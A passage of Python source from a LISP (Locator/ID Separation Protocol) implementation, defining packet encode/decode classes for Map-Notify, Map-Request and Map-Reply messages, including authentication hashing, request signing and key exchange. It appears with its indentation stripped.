xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify(object):
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request(object):
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data.encode())
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig.decode() }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
sig_data = sig_data.encode()
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 4)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string.encode()
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (addr_str in lisp_crypto_keys_by_rloc_encap):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 4): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
# If telemetry data in the JSON, do not need to convert to dict array.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert string to dictionary array.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if ("source-eid" not in json_string): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if ("signature-eid" not in json_string): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if ("signature" not in json_string): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == None): return(None)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (addr_str in rloc_keys): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (addr_str in lisp_crypto_keys_by_rloc_decap):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply(object):
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
